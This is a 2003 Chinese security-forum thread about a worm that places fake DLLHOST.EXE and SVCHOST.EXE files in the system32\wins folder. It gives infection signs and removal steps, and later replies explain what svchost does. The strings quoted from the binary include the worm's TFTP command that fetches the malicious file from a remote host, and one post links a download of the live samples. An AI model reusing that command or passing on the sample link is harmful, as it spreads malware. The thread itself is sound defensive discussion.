|
 | 作者: abctm [abctm]
 版主 |
登录 |
| 文章来自 金山论坛 ->毒霸家族 ->金山毒霸讨论区 原文地址:http://bbs.kingsoft.net/index.php?act=ST&f=3&t=227591&s=3d18a2a30a7c17b0ee0f3e774886d0ad 金山的报告: http://www.duba.net/c/2003/08/18/89650.shtml 可能和今天机子老被人PING有关~ 解决方法! 停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务 看到这2个服务就停止他们 Network connections Sharing WINS Client 然后到WINS目录里删除这2个文件。。安装防护墙 如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒 DLLHOST.EXE里面有这样的话! =========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE 如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。 这决对不是玩笑!!! 我是玩HACK的。。这文件我SNIFF过。。反编译过。。。我是黑客圈里叫[D]KING 如果有什么问题,,,你可以说 说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!! 如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里 如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里 这2个文件大家想研究可以在这里下 http://hy88.nease.net/pingvirus.rar 传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE 正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕 如果你的防护墙被PING..那么你那里有一定有机器中了!! 这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING !!下面是解决方法 !!!!!下面是解决方法!!! 停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务 看到这2个服务就停止他们 Network connections Sharing WINS Client 然后到WINS目录里删除这2个文件。。安装防护墙 |
| 地主 发表时间: 10/22 12:09 |
 | 回复: Ali88 [lian_love]  论坛用户 |
登录 |
|
那进程里的svchost 进程要不要禁止啊! 对了,这个进程是干什么的啊?/ |
| B1层 发表时间: 10/23 11:51 |
| 回复: abctm [abctm] 版主 |
登录 |
|
解疑对Svchost的困惑Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位在系统的%systemroot%\system32文件夹下。在启动的时候,Svchost.exe检查注册表中的位置来构建需要加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务,以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。 . Svchost.exe 组是用下面的注册表值来识别。 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost 每个在这个键下的值代表一个独立的Svchost组,并且当你正在看活动的进程时,它显示作为一个单独的例子。每个键值都是REG_MULTI_SZ类型的值而且包括运行在Svchost组内的服务。每个Svchost组都包含一个或多个从注册表值中选取的服务名,这个服务的参数值包含了一个ServiceDLL值。 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service . . 更多的信息 . 为了能看到正在运行在Svchost列表中的服务。 开始-运行-敲入cmd 然后在敲入 tlist -s (tlist 应该是win2k工具箱里的东东) Tlist 显示一个活动进程的列表。开关 -s 显示在每个进程中的活动服务列表。如果想知道更多的关于进程的信息,可以敲 tlist pid。 Tlist 显示Svchost.exe运行的两个例子。 0 System Process 8 System 132 smss.exe 160 csrss.exe Title: 180 winlogon.exe Title: NetDDE Agent 208services.exe Svcs: AppMgmt,Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,LanmanWorkst ation,LmHosts,Messenger,PlugPlay,ProtectedStorage,seclogon,TrkWks,W32Time,Wmi 220 lsass.exe Svcs: Netlogon,PolicyAgent,SamSs 404 svchost.exe Svcs: RpcSs 452 spoolsv.exe Svcs: Spooler 544 cisvc.exe Svcs: cisvc 556 svchost.exe Svcs: EventSystem,Netman,NtmsSvc,RasMan,SENS,TapiSrv 580 regsvc.exe Svcs: RemoteRegistry 596 mstask.exe Svcs: Schedule 660 snmp.exe Svcs: SNMP 728 winmgmt.exe Svcs: WinMgmt 852 cidaemon.exe Title: OleMainThreadWndName 812 explorer.exe Title: Program Manager 1032 OSA.EXE Title: Reminder 1300 cmd.exe Title: D:\WINNT5\System32\cmd.exe - tlist -s 1080 MAPISP32.EXE Title: WMS Idle 1264 rundll32.exe Title: 1000 mmc.exe Title: Device Manager 1144 tlist.exe 在这个例子中注册表设置了两个组。 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost: netsvcs: Reg_Multi_SZ: EventSystem Ias Iprip Irmon Netman Nwsapagent RasautoRa sman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc rpcss :Reg_Multi_SZ: RpcSs smss.exe csrss.exe 这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统必须一直运行。csrss 负责控制windows,创建或者删除线程和一些16位的虚拟MS-DOS环境。 |
| B2层 发表时间: 10/23 12:55 |
 | 回复: zpszhang [zpszhang]  论坛用户 |
登录 |
|
现在我的机子一重起拔号不行要重装才行 不过我在wins里发现你说的病毒,但我的机子一安装完新的软件就会蓝屏,然后倒数重启,而且我在进程里发一几个怪乱进程道底什么原因 |
| B3层 发表时间: 10/23 16:15 |
| 回复: abctm [abctm] 版主 |
登录 |
|
你说清楚好么 最简单的法子大家都会呀! 用最新的杀毒软件【杀无赦】 |
| B4层 发表时间: 10/23 19:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 新病毒,不比冲击波差!!传染更强!被PING的进来看看